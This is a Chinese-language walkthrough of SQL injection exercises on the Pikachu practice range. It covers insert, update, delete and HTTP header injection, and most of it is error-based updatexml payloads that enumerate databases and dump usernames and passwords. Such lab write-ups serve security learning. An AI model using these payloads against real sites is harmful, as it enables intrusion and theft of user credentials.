insert&update注入

insert/update是插入和更新的意思,这两个场景的注入,post数据包里的每一个参数都可以注入

insert注入

首先在注册的时候抓包分析。

41

注册页面,在用户框内输入单引号,密码为必填项,随意输入几个数字,提交。页面返回报错信息如图

42

由报错信息可以知道,输入的数据直接拼接入该sql查询语句中,存在着SQL注入漏洞。

1.查找数据库

1' or updatexml(1,concat(0x7e,database()),1)) #	

43

2.查找数据库中的表

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1)),1))#

44

3.查找指定表中的字段名

1' or updatexml(1,concat(0x7e,(select group_concat(column_name )  from information_schema.columns where table_schema= database() and table_name='users'),0x7e),2)or '

45

查询指定表下的所有数据

1' or updatexml(1,concat(0x7e,(select group_concat(id,username,password,level) from users),0x7e),1) or '
或用limit读取
' or updatexml(1,concat(0x7e,(select password from users limit 1,1)),1)or'

46

update注入

注: 只有性别,手机,住址,邮箱全都有值的时候,才会执行修改用户信息的操作,否则该操作不执行

修改页面,在性别框内输入单引号,其他几项必填项,随意输入几个数字,提交。页面返回报错信息如图

47

由报错信息可以知道,输入的数据直接拼接入该sql查询语句中,存在着SQL注入漏洞。

查询指定字段的内容

' or updatexml(1,concat(0x7e,(select group_concat(username) from users)),1)or'

48

查询指定数据库表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),2) or '

49

查询指定表下的字段名

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2) or '

50

查询指定表下的所有数据

' or+updatexml(1,concat(0x7e,(select group_concat(id,username,password,level) from users),0x7e),2) or ' 
或用limit读取
' or updatexml(1,concat(0x7e,(select password from users limit 1,1)),1)or'

51

delete注入

页面为空白的留言板,输入框是无法注入的。随便加入几条信息,可以看到留言列表多出了刚刚插入的信息。

52

既然都说了时delete注入,那肯定和删除有关了,我们在删除时抓包,可以看到是get型传参

53

右键发送至Repeater,可以通过修改URL的id参数进行SQL注入。

修改id=58’,报错,可判断存在SQL注入

54

可以直接在url进行操作,查询数据库名pikachu

1+or+updatexml(1,concat(0x7e,database()),0)
或
59%20or%20updatexml(1,concat(0x7e,(select%20database())),1)	

55

查询指定数据库表名

56+and+updatexml(1,concat(0x7e,(select+group_concat(schema_name)+from+information_schema.schemata),0x7e),2)

56

56+and+updatexml(1,concat(0x7e,(select+group_concat(column_name)+from+information_schema.columns+where+table_schema=database()+and+table_name='users'),0x7e),2)

57

查询表下所有数据

56+or+updatexml(1,concat(0x7e,(select+group_concat(id,username,password,level)+from+users),0x7e),2)
或拖过limit读取
56+or+updatexml(1,concat(0x7e,(select+password+from+users+limit+0,1)),1)

58

http header注入

输入admin/123456,点击login登录

59

打开burp的拦截,刷新该页面,将拦截到的报文发送至repeater。

修改user agent或Accept参数注入

User-Agent:处注入

查询数据库名

' or updatexml(1,concat(0x7e,(select database())),1)or'

60

查询所有数据库

' or updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),2)or '

61

查询指定数据库表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),2)or '

62

查询指定表下的字段名

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2)or '

63

查询指定表下的所有数据

 ' or updatexml(1,concat(0x7e,(select group_concat(id,username,password,level) from users),0x7e),2)or '
或者
' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)or'

64

Accept处注入

查询数据库名

' or updatexml(1,concat(0x7e,(select database())),1)or'

65

查询所有数据库

' or updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),2)or '

66

查询指定数据库表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),2)or '

67

查询指定表下的字段名

' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),2)or '

68

查询指定表下的所有数据

 ' or updatexml(1,concat(0x7e,(select group_concat(id,username,password,level) from users),0x7e),2)or '
或者
' or updatexml(1,concat(0x7e,(select password from users limit 0,1)),1)or'

69


参考链接:

无垠安全:https://www.wuyini.cn/952.html

Pikachu靶场通关之SQL注入 - FreeBuf网络安全行业门户:https://www.freebuf.com/articles/web/254079.html